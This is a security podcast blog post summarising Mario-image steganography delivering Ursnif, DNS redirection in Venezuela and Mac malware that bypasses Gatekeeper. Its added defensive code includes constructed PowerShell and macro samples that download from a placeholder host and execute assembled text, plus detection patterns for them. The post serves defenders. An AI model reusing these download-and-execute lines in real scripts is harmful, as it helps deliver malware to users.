Breaking Badness

2. African or European EXEs


Here are a few highlights from each article we discussed:

Hey It’s-a-Me, Malware

In this article, which was featured in Bromium, the attacker uses steganography to extract data from the pixels of a Mario image. Below is a breakdown of this particular attack:

  1. A spreadsheet builds a PowerShell command from individual pixels in a downloaded image of Super Mario Bros.
  2. This tactic was used to download Gozi/Ursnif and potentially other malware as well (only Gozi/Ursnif confirmed).
  3. This attack is targeting people in Italy – if the machine is not located within Italy, the macro is coded to exit Excel immediately (it does this by using the Application.International MS Office property, which returns information about the current country/region and international settings).
  4. Next, an email attachment of an Excel document asks you to enable macros; once enabled, the macro runs cmd.exe and PowerShell.
  5. The PowerShell downloads an image of Super Mario (it’s-a-me) and extracts data from the pixels of that image.
  6. It’s designed to do a final check to ensure the victim is located in Italy, and if so, it downloads a malicious executable, which is the Ursnif malware.
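A defender mostly wants to recognise this loader pattern in scripts and macros before it runs: an imaging API used for per-pixel reads, a download, and the assembled string being executed, plus the country check in the macro. The scanner below is an added example written for this post, not code from the Bromium article; the three script fragments are constructed inputs (not real malware), and the indicator names, regexes, the placeholder URL and TARGET_CODE are all assumptions made here.

```python
import re

# Constructed PowerShell fragment with the traits the story describes (image
# download, per-pixel reads, assembling a string, executing it). It is not real
# malware, the URL is a placeholder, and it exists only as scanner input.
SUSPICIOUS_SAMPLE = r"""
$wc = New-Object System.Net.WebClient
$wc.DownloadFile('http://example.invalid/mario.png', $img)
$bmp = New-Object System.Drawing.Bitmap($img)
foreach ($y in 0..10) { $chars += [char]$bmp.GetPixel($x, $y).R }
Invoke-Expression ($chars -join '')
"""

# Constructed VBA fragment: the country check the story mentions, followed by
# spawning cmd.exe/PowerShell. TARGET_CODE is a placeholder, not a real value.
MACRO_SAMPLE = r"""
If Application.International(xlCountryCode) <> TARGET_CODE Then Application.Quit
Shell "cmd.exe /c powershell -w hidden -f stage1.ps1", vbHide
"""

# Constructed benign script: same imaging API, used for a thumbnail, with no
# pixel reads and no execution of assembled text.
BENIGN_SAMPLE = r"""
$bmp = New-Object System.Drawing.Bitmap('C:\pics\logo.png')
$thumb = $bmp.GetThumbnailImage(64, 64, $null, [IntPtr]::Zero)
$thumb.Save('C:\pics\logo_small.png')
"""

# (indicator name, pattern). Names are chosen here; patterns are case-insensitive.
INDICATORS = [
    ("image_api", re.compile(r"System\.Drawing\.Bitmap", re.I)),
    ("pixel_read", re.compile(r"\.GetPixel\s*\(", re.I)),
    ("download", re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I)),
    ("execute", re.compile(r"Invoke-Expression|\biex\b", re.I)),
    ("region_check", re.compile(r"Application\.International", re.I)),
    ("macro_spawn", re.compile(r"\bShell\b.*\b(cmd\.exe|powershell)\b", re.I)),
]


def scan_script(text):
    """Return the names of every indicator that fires on the script text, in list order."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def verdict(hits):
    """Combine indicators: a single imaging call is normal; pixel reads feeding
    execution (or a download) is the loader; region check plus a spawned shell
    is the macro side of the same chain."""
    h = set(hits)
    if {"pixel_read", "execute"} <= h:
        return "likely-stego-loader"
    if {"pixel_read", "download"} <= h:
        return "suspicious"
    if {"region_check", "macro_spawn"} <= h:
        return "suspicious-macro"
    return "benign"


if __name__ == "__main__":
    for label, sample in (("powershell", SUSPICIOUS_SAMPLE),
                          ("macro", MACRO_SAMPLE),
                          ("benign", BENIGN_SAMPLE)):
        hits = scan_script(sample)
        print(f"{label:11s} {verdict(hits):22s} {hits}")
```

The point of the combination logic is that none of the indicators is suspicious on its own (thumbnail generation uses the same Bitmap class), so alerting should key on the pairing of pixel reads with execution or a download, which is exactly the behaviour the breakdown above describes.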

Ursnif is an info stealer and has capabilities including:

  • Capture screenshots
  • Steal cookies
  • Clear cookies
  • Steal certificates
  • Reboot machine
  • Start a SOCKS proxy
  • Upload a log file that contains user information
  • Get a list of active running processes
  • Terminate process
  • Download and install a new executable

DNS Manipulation in Venezuela

Securelist detailed a manipulation of DNS in Venezuela. In this case, a website was set up for people to register to aid in the humanitarian crisis in Venezuela.

  1. A separate site was created 5 days later with a similar domain name, which spoofed the legitimate site’s domain name.
  2. Within Venezuela, these two sites are both directed to the same IP, which is the IP of the nefarious domain.
  3. Outside of Venezuela, however, they are sent to two different IPs.
    • The DNS manipulation is only occurring within Venezuela (therefore, we know it is not site registration manipulation).

Technically, how this might work:

  • Alter the record for the legitimate site on the in-country DNS servers so that it points to the bad domain’s IP address.
  • That requires access to those DNS servers, either by hacking in or by having legitimate access.
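The reasoning in the story (same IP inside the country, different IPs outside, therefore resolver-level manipulation rather than a registration change) can be turned into a check that runs over resolution results gathered from several vantage points. The code below is an added example written for this post, not the Securelist authors' tooling; the observation list is constructed, the domain names and IPs are documentation placeholders rather than the real ones, and the vantage-point naming scheme and verdict labels are assumptions made here.

```python
from collections import defaultdict

# Constructed observations: (vantage point, domain queried, A record returned).
# The in-country resolvers return the lookalike's IP for BOTH names; external
# resolvers return distinct IPs, mirroring the pattern described in the story.
OBSERVATIONS = [
    ("resolver-in-country-1", "legit-site.example", "203.0.113.9"),
    ("resolver-in-country-2", "legit-site.example", "203.0.113.9"),
    ("resolver-in-country-1", "lookalike-site.example", "203.0.113.9"),
    ("resolver-in-country-2", "lookalike-site.example", "203.0.113.9"),
    ("resolver-external-1", "legit-site.example", "198.51.100.20"),
    ("resolver-external-2", "legit-site.example", "198.51.100.20"),
    ("resolver-external-1", "lookalike-site.example", "203.0.113.9"),
    ("resolver-external-2", "lookalike-site.example", "203.0.113.9"),
]

# Assumed naming convention: vantage points inside the country share this prefix.
IN_COUNTRY_PREFIX = "resolver-in-country"


def answers_by_vantage(observations, domain):
    """Group the answers for one domain into {'in-country': {ips}, 'external': {ips}}."""
    groups = defaultdict(set)
    for vp, dom, ip in observations:
        if dom != domain:
            continue
        group = "in-country" if vp.startswith(IN_COUNTRY_PREFIX) else "external"
        groups[group].add(ip)
    return dict(groups)


def classify(observations, legit, lookalike):
    """Decide where the redirect lives by comparing the legit domain's answers
    across vantage points against the lookalike domain's answers."""
    legit_ans = answers_by_vantage(observations, legit)
    look_ans = answers_by_vantage(observations, lookalike)
    inside = legit_ans.get("in-country", set())
    outside = legit_ans.get("external", set())
    if not inside or not outside:
        return "insufficient-data"
    if inside == outside:
        # Same answer everywhere: if it is the lookalike's IP the change is in
        # the zone/registration itself; otherwise nothing looks wrong.
        if inside & look_ans.get("external", set()):
            return "global-redirect"
        return "consistent"
    if inside <= look_ans.get("in-country", set()):
        # Only in-country resolvers hand out the lookalike's address.
        return "in-country-dns-manipulation"
    return "inconsistent-resolution"


if __name__ == "__main__":
    print(answers_by_vantage(OBSERVATIONS, "legit-site.example"))
    print(classify(OBSERVATIONS, "legit-site.example", "lookalike-site.example"))
```

In practice the observation list would be filled by querying each resolver directly (for example with dig pointed at specific servers) rather than relying on the local stub resolver; the classification itself does not depend on how the answers were collected.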

African or European EXEs (Shlayer and Mac Windows .EXE Malware)

This week, two new variants of Mac malware were discovered, both of which bypass Gatekeeper to infect Mac devices. Gatekeeper is similar to the infamous Bridgekeeper from Monty Python and the Holy Grail, in that it stands guard to prevent unauthorized access. And like the Bridgekeeper, it turns out Gatekeeper was a little easier to defeat than it initially seemed.

In an article featured in Carbon Black’s blog, a new variant of Shlayer, which was first seen in the wild in Feb 2018, can now escalate privileges using an older technique to disable the Gatekeeper function that prevents unsigned code from being run. Here’s how it works:

  1. This attack is disguised as an Adobe Flash software update through a combination of fake popups on hijacked domains or legitimate site clones, or in malvertising campaigns. It affects versions of macOS from 10.10.5 to 10.14.3.
  2. Many of the initial DMGs are signed with a legitimate Apple developer ID and use legitimate system applications via bash to conduct all installation activity.
  3. It then collects system information such as the macOS version and IOPlatformUUID (a unique identifier for the system) and generates a “Session GUID” using uuidgen.
  4. Next, it creates a custom URL using the information generated in the previous step and downloads the second stage payload. For example:
  5. After the second stage payload is downloaded and executed, it attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline.
  6. Once the malware has elevated to root privileges, it attempts to download additional software (observed to be adware in the analyzed samples) and disables Gatekeeper for the downloaded software using spctl. This allows the allowlisted software to run without user intervention even if the system is set to disallow unknown applications downloaded from the internet.

In the second Mac malware story we covered in Trend Micro’s blog, a malicious Windows EXE can infect Mac computers. It’s curious, as EXE is normally a Windows-only file format and will return an error if you attempt to run it on a Mac or Linux system. See further information on this malware below:

  1. This particular EXE bypasses Gatekeeper, which only checks native Mac files: because EXE is not a format Gatekeeper inspects, the code signature check and verification are never applied to it.
  2. Next, a popular firewall app for Mac and Windows called “Little Snitch” is installed. The malware comes as a DMG file that hosts the Little Snitch installer.

The malicious EXE is buried in the installer contents.

  • When the installer is executed, the main file also launches the executable, which is made possible by the Mono framework included in the bundle. This framework allows Microsoft .NET applications to run across platforms such as OSX.
  • This particular malware collects system information, including:
    • ModelName
    • ModelIdentifier
    • ProcessorSpeed
    • ProcessorDetails
    • NumberofProcessors
    • NumberofCores
    • Memory
    • BootROMVersion
    • SMCVersion
    • SerialNumber
    • UUID

It also scans for certain apps from a predetermined list (such as QuickTime, iTunes, etc.), and sends all the info back to the C2 server. If this malware is run on a Windows machine, it returns an error.
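Since Gatekeeper does not inspect EXE files, the practical defensive check is to look for Windows PE binaries inside downloaded DMGs and app bundles by their header rather than their file extension. The scanner below is an added example written for this post, not Trend Micro's or Apple's tooling; it builds a constructed bundle tree in a temporary directory (a header-only fake PE under a .dat name, a file with the Mach-O magic, and two decoys) and reports what it would flag. The file names and the demo_bundle helper are assumptions made here.

```python
import os
import struct
import tempfile

PE_SIGNATURE = b"PE\0\0"  # signature found at the offset stored in the DOS header's e_lfanew (0x3C)


def is_pe_bytes(data):
    """True when data starts with the DOS 'MZ' stub and e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    return data[pe_off:pe_off + 4] == PE_SIGNATURE


def is_pe_file(path):
    """Same check against a file on disk, reading only the header and the signature."""
    try:
        with open(path, "rb") as f:
            head = f.read(0x40)
            if len(head) < 0x40 or head[:2] != b"MZ":
                return False
            pe_off = struct.unpack_from("<I", head, 0x3C)[0]
            f.seek(pe_off)
            return f.read(4) == PE_SIGNATURE  # short read past EOF returns b"" -> False
    except OSError:
        return False


def find_pe_files(root):
    """Walk a directory tree and return forward-slash relative paths of every PE file,
    whatever its extension."""
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if is_pe_file(full):
                found.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(found)


def make_fake_pe():
    """Constructed header-only bytes: 'MZ', e_lfanew = 0x40, then 'PE\\0\\0'. Not a runnable binary."""
    buf = bytearray(0x44)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = PE_SIGNATURE
    return bytes(buf)


def demo_bundle():
    """Build a constructed installer tree and return what the scan flags."""
    root = tempfile.mkdtemp(prefix="bundle-")
    files = {
        "Contents/Resources/Installer.dat": make_fake_pe(),                 # PE hidden behind a harmless extension
        "Contents/MacOS/Installer": b"\xcf\xfa\xed\xfe" + b"\0" * 60,       # 64-bit Mach-O magic, not PE
        "Contents/Resources/notes.txt": b"MZ is just text here",            # starts with MZ but too short
        "Contents/Resources/odd.bin": b"MZ" + b"\0" * 0x3A                  # e_lfanew far past EOF
                                      + struct.pack("<I", 0xFFFFFF) + b"\0\0\0\0",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return find_pe_files(root)


if __name__ == "__main__":
    print(demo_bundle())
```

Checking the e_lfanew pointer as well as the MZ bytes matters: plenty of non-PE data begins with the letters MZ, and the two decoys in the constructed tree show the short-file and out-of-range cases being rejected rather than raising.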


This Week’s Hoodie Scale

Hey It’s-a-Me, Malware

[Tim]: 4/10 Hoodies
[Emily]: 5/10 Hoodies

DNS Manipulation in Venezuela

[Tim]: 7/10 Hoodies
[Emily]: 7/10 Hoodies

African or European EXEs

[Tim]: 4/10 Hoodies
[Emily]: 4/10 Hoodies

That’s about all we have for this week. You can find us on Twitter @domaintools, and all of the articles mentioned in our podcast will always be included in our blog. Catch us next Wednesday at 9 AM Pacific time when we publish our next podcast and blog.

*A special thanks to John Roderick for our incredible podcast music!